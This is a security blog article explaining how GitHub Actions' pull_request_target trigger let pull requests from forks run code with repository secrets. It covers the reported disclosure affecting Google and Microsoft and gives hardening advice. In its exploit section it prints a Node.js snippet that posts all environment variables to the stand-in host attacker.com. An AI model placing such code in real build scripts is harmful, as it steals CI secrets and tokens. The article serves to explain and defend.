Introduction: When Automation Becomes the Attack Vector
CI/CD pipelines are supposed to protect us from human error—but in some cases, they become the entry point for full-scale compromise. In late 2024, a researcher from Orca Security, Roin (roin-orca), uncovered a shocking vulnerability pattern in GitHub Actions workflows used by industry giants like Google and Microsoft. The discovery exposed a hidden truth: even the most sophisticated engineering organizations can fall prey to dangerous automation shortcuts.
The vulnerability revolved around a misunderstood GitHub Actions trigger—pull_request_target. A feature designed for convenience ended up providing attackers with the keys to the kingdom. By abusing how GitHub handles PRs from forks, an attacker could get their malicious code executed inside trusted environments, potentially accessing secrets, tokens, and deployment credentials. This wasn't an obscure corner case—it was a ticking time bomb hiding in plain sight across countless open-source projects.
How the Vulnerability Worked: The Dangerous Duality of pull_request_target
At first glance, pull_request_target seems like a helpful trigger. It lets workflows run in the context of the base repository instead of the contributor's fork. That means it has access to repository secrets, permissions, and write privileges—perfect for automations like commenting, labeling, or merging. But that's exactly the problem. When combined with untrusted PR code, this becomes a recipe for disaster.
Here's how it happens: A malicious actor opens a pull request from their fork, modifying files that the workflow runs (for example, a test script or build tool). The workflow, triggered by pull_request_target, executes these changes with the base repository's privileges. The attacker's code can then read or exfiltrate secrets. Even worse, it can perform remote code execution (RCE) on the runner environment—essentially compromising your CI/CD machine.
This isn't theoretical. Roin's research showed that workflows in Google and Microsoft's public repositories were configured this way. The risk wasn't that these companies were negligent—it's that the subtle difference between pull_request and pull_request_target wasn't widely understood until someone weaponized it.
The Exploit in Action: Turning a Simple PR into Full Compromise
Imagine this scenario: You fork a repository and open a PR adding a new feature. In your PR, you modify a script—say, test/build.js. The repository uses pull_request_target to automatically run checks on all PRs. The workflow checks out your forked code, runs that script, and has full access to environment secrets like GITHUB_TOKEN or deployment keys.
An attacker could inject something as simple as:
// test/build.js
const fs = require("fs");
const https = require("https");
const secrets = process.env;
https.request({
hostname: "attacker.com",
method: "POST",
path: "/steal",
headers: { "Content-Type": "application/json" }
}).end(JSON.stringify(secrets));
That's it—instant exfiltration. Once the PR is opened, the workflow runs automatically and leaks secrets without ever needing to be merged. It's an elegant, terrifyingly simple exploit that highlights how automation and trust boundaries can crumble with a single misconfigured trigger.
The Aftermath: How Big Tech Reacted and the Industry Wake-Up Call
When Orca Security responsibly disclosed the issue, the response was swift. GitHub, Google, and Microsoft patched affected workflows, rotated compromised tokens, and updated documentation to emphasize the dangers of pull_request_target. But the larger story wasn't about a single vulnerability—it was about how pervasive insecure workflow design had become.
Thousands of open-source maintainers began auditing their workflows, realizing they had unknowingly exposed their repositories to similar risks. Security researchers started scanning for pull_request_target patterns in public repos, finding alarming results. The uncomfortable truth emerged: many developers were using this trigger for convenience, not understanding its implications.
This was a moment of reckoning for the developer community. It showed that CI/CD pipelines—often treated as operational plumbing—are part of the attack surface. Automation doesn't mean safety; it means amplified risk if not handled correctly.
Best Practices: How to Avoid This Mistake
To avoid repeating this nightmare, you need a clear rule: never execute untrusted code with access to secrets. For public repositories, always use the pull_request trigger, which safely runs workflows in the fork's context without repository secrets.
If you must use pull_request_target, treat it like handling radioactive material. Only use it for workflows that don't touch code—like labeling, commenting, or validating metadata. And if you must check out PR code, explicitly disable write permissions and sanitize all execution paths.
A secure workflow should look like this:
name: Safe PR Checks
on:
pull_request:
types: [opened, synchronize]
permissions:
contents: read
jobs:
test:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- run: npm ci
- run: npm test
Security in CI/CD is about intent. Understand why your workflow exists and who it's running for. Automation is a double-edged sword—sharp, efficient, and dangerous when mishandled.
The Brutal Truth: Security Debt Is Technical Debt
Every shortcut you take in your CI/CD workflow today becomes tomorrow's breach headline. The Google–Microsoft incident was a wake-up call for everyone building software on GitHub. It proved that even the most secure organizations can fall for design oversights when the system's complexity obscures its risks.
The brutal truth? Most developers don't think about their CI pipelines as part of the attack surface. They see them as neutral automation tools. But attackers see them as a goldmine—privileged machines running unreviewed code. You can't secure what you don't understand, and pull_request_target exposed exactly that gap in understanding.
If you maintain an open-source project, it's time to review your workflows. Check every on: trigger, review your permissions, and stop trusting automation by default. In the security world, trust is earned—not assumed.
Conclusion: Lessons Learned from the Pull Request Nightmare
Roin's discovery was more than a vulnerability report—it was a mirror held up to the industry's complacency. GitHub Actions gave developers immense power, but power without understanding breeds chaos. The pull_request_target flaw reminded us that security isn't about patching after the fact; it's about designing with threat models in mind from day one.
The next time you write a GitHub workflow, remember this story. Every trigger is a security decision. Every convenience is a potential trade-off. The nightmare wasn't that attackers could exploit a PR—it's that developers unknowingly invited them in.
Automation is only as safe as your discipline. And if you don't audit it, someone else will.